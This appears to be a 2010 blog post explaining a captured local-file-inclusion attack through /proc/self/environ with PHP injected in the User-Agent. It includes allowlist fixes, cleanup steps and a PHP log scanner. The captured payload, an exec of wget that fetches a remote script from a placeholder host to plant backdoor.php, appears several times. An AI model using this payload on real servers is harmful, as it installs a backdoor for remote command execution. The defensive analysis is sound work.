21 June 2010
<? exec("wget http://[remotescript].txt -O backdoor.php"); ?>
This is a simplified version of what was captured in the user agent field.
What the hacker was hoping for
What we have here is a local file inclusion (LFI) attack coupled with injected PHP code.
The visitor is hoping that my file inclusion code is written something like this:
// Include file requested
Thus the file that will be included would be:
/var/www/../../proc/self/environ (which resolves to /proc/self/environ)
The hacker is attempting to include the /proc entry for the Apache process that is handling his request. /proc/ contains information about every running process (thread), and /proc/self/ refers to whichever process is reading it, here the Apache worker. The process environment in /proc/self/environ holds values such as the visitor's IP address, User-Agent, the script called and others like these:
DOCUMENT_ROOT=/var/www
GATEWAY_INTERFACE=CGI/1.1
HTTP_ACCEPT=text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1
HTTP_COOKIE=PHPSESSID=
HTTP_HOST=www.example.com
HTTP_USER_AGENT=Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
PATH=/bin:/usr/bin
QUERY_STRING=
REMOTE_ADDR=x.x.x.x
REMOTE_PORT=xxxx
REQUEST_METHOD=GET
REQUEST_URI=/index.php
SCRIPT_FILENAME=/var/www/index.php
SCRIPT_NAME=/index.php
SERVER_ADDR=x.x.x.x
SERVER_ADMIN=email@example.com
SERVER_NAME=www.example.com
SERVER_PORT=80
SERVER_PROTOCOL=HTTP/1.1
SERVER_SIGNATURE=
However, because the hacker has supplied his own custom User-Agent, the HTTP_USER_AGENT value in that file is PHP code, and when the file is pulled in through include() the interpreter parses and executes it. That code then runs a shell command to fetch a remote script and write it into the website folder as backdoor.php:
// Fetch the remote script and save it as backdoor.php in the website folder
exec("wget http://[remotescript].txt -O backdoor.php");
The hacker can now visit backdoor.php and run any command he wants on your web server.
How to prevent this
- Sanitize your inputs
- Check for and reject directory traversal sequences (../) in anything used to build a path
- Work with an allowed list of files
$allowed_files = array('file1.php', 'file2.php');
// array_search() returns the index on a match and false otherwise, so test against false, not NULL
$allowed_index = array_search($_GET['file'], $allowed_files, true);
if ($allowed_index !== false) {
    include $allowed_files[$allowed_index];
}
- Don't allow visitors to specify the file by name; map short keys to file names instead:
$allowed_files = array('file1' => 'file1.php', 'file2' => 'file2.php');
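As an added example (not the post's own code), here is a complete version of the keyed-allowlist approach from the last two points, covering both the "allowed list" and the "don't specify by name" advice. The `page` query parameter, the `$pages` map and the `pages/` directory are assumptions for illustration, as is the vulnerable `include($_SERVER['DOCUMENT_ROOT'] . $_GET['file'])` pattern it is meant to replace:

```php
<?php
// Added example, not the post's own code: a keyed allowlist replacing the
// assumed vulnerable include($_SERVER['DOCUMENT_ROOT'] . $_GET['file']) pattern.
// The 'page' parameter, the $pages map and the pages/ directory are
// assumptions for illustration.

// Returns the file for a requested key, or null if the request is not one of
// the known keys. The visitor never supplies a path, so traversal sequences,
// absolute paths such as /proc/self/environ and NUL bytes cannot reach include().
function resolve_page(array $pages, $requested)
{
    // ?page[]=x arrives as an array; only a plain string is acceptable.
    if (!is_string($requested)) {
        return null;
    }
    // Exact key match: '../../proc/self/environ' is simply not a key.
    if (!array_key_exists($requested, $pages)) {
        return null;
    }
    return $pages[$requested];
}

$pages = array(
    'home'    => 'pages/home.php',
    'about'   => 'pages/about.php',
    'contact' => 'pages/contact.php',
);

$requested = isset($_GET['page']) ? $_GET['page'] : 'home';
$target    = resolve_page($pages, $requested);

if ($target === null) {
    // Unknown key: record the attempt (this log entry is what you will search
    // for later) and answer 404 without including anything.
    error_log(sprintf('Rejected page key %s from %s',
        var_export($requested, true), $_SERVER['REMOTE_ADDR']));
    header('HTTP/1.0 404 Not Found');
    exit;
}

// Only a value taken from the map, never from the request, reaches include.
include __DIR__ . '/' . $target;
```

The design point is that the request value is used purely as a lookup key and is never concatenated into a path, so there is nothing to sanitize: either the key exists in the map or the request is refused and logged.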
Course of Action
If this has happened to you, do the following:
- Take the server offline (if possible)
- Check the active process list for unknown scripts and kill them
- Patch/fix the file inclusion vulnerability (update your web application to the latest version)
- Check your httpd/apache logs (located in either /var/log/httpd/ or /var/log/apache/ folders) for visits from the hacker to determine his IP address(es) and pinpoint which scripts he was hitting (to identify backdoors)
- Remove backdoor scripts
- Monitor your logs. The hacker will probably return and attempt to reinfect your server.
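For the log-checking step, here is an added example (not from the post) that scans an Apache combined-format access log for the two signs of this attack seen above, a request referencing proc/self/environ and a User-Agent carrying a PHP open tag, and then lists every path each flagged IP requested so you know which scripts to inspect as possible backdoors. The three log lines embedded in it are constructed for illustration; pass the path of a real access log as the first argument to scan that instead.

```php
<?php
// Added example, not the post's own code: scan an Apache combined-format
// access log for the two tell-tale signs of this attack, a request that
// references proc/self/environ and a User-Agent carrying a PHP open tag,
// then list every path each flagged IP requested so you know which scripts
// (candidate backdoors) to inspect. The sample lines below are constructed.

$sample_log = <<<'LOG'
203.0.113.5 - - [21/Jun/2010:10:01:02 +0000] "GET /index.php?file=../../proc/self/environ HTTP/1.1" 200 5120 "-" "<? exec(\"wget http://[remotescript].txt -O backdoor.php\"); ?>"
198.51.100.7 - - [21/Jun/2010:10:02:15 +0000] "GET /index.php?file=about.php HTTP/1.1" 200 3210 "-" "Mozilla/5.0 (X11; Linux x86_64)"
203.0.113.5 - - [21/Jun/2010:10:03:40 +0000] "GET /backdoor.php HTTP/1.1" 200 87 "-" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)"
LOG;

// Split one combined-format line into ip, method, path and user agent; null if
// it does not match. The greedy final group keeps escaped quotes inside the UA.
function parse_access_line($line)
{
    $re = '/^(\S+) \S+ \S+ \[[^\]]+\] "(\S+) (\S+)[^"]*" \d{3} \S+ "[^"]*" "(.*)"$/';
    if (!preg_match($re, $line, $m)) {
        return null;
    }
    return array('ip' => $m[1], 'method' => $m[2], 'path' => $m[3], 'ua' => $m[4]);
}

// Returns ip => array('reasons' => [...], 'paths' => [...]) for flagged IPs only.
function scan_access_log($log_text)
{
    $reasons = array();
    $paths   = array();
    foreach (preg_split('/\r?\n/', trim($log_text)) as $line) {
        $e = parse_access_line($line);
        if ($e === null) {
            continue;
        }
        $paths[$e['ip']][] = $e['path'];
        // Decode %2e%2e%2f style encoding before looking for the target file.
        $decoded = strtolower(rawurldecode($e['path']));
        if (strpos($decoded, 'proc/self/environ') !== false) {
            $reasons[$e['ip']][] = 'proc/self/environ requested: ' . $e['path'];
        }
        if (strpos($e['ua'], '<?') !== false) {
            $reasons[$e['ip']][] = 'PHP tag in User-Agent: ' . $e['ua'];
        }
    }
    $report = array();
    foreach ($reasons as $ip => $why) {
        $report[$ip] = array(
            'reasons' => $why,
            'paths'   => array_values(array_unique($paths[$ip])),
        );
    }
    return $report;
}

$log_text = (isset($argv[1]) && is_readable($argv[1])) ? file_get_contents($argv[1]) : $sample_log;

foreach (scan_access_log($log_text) as $ip => $info) {
    echo "Suspicious IP: $ip\n";
    foreach ($info['reasons'] as $r) {
        echo "  - $r\n";
    }
    echo "  Paths hit by this IP (check each for backdoors): " . implode(', ', $info['paths']) . "\n";
}
```

On the constructed sample the script flags 203.0.113.5 for both indicators and reports that the same address later requested /backdoor.php, which is exactly the kind of script the "remove backdoor scripts" step is looking for; 198.51.100.7 is an ordinary visitor and is not reported.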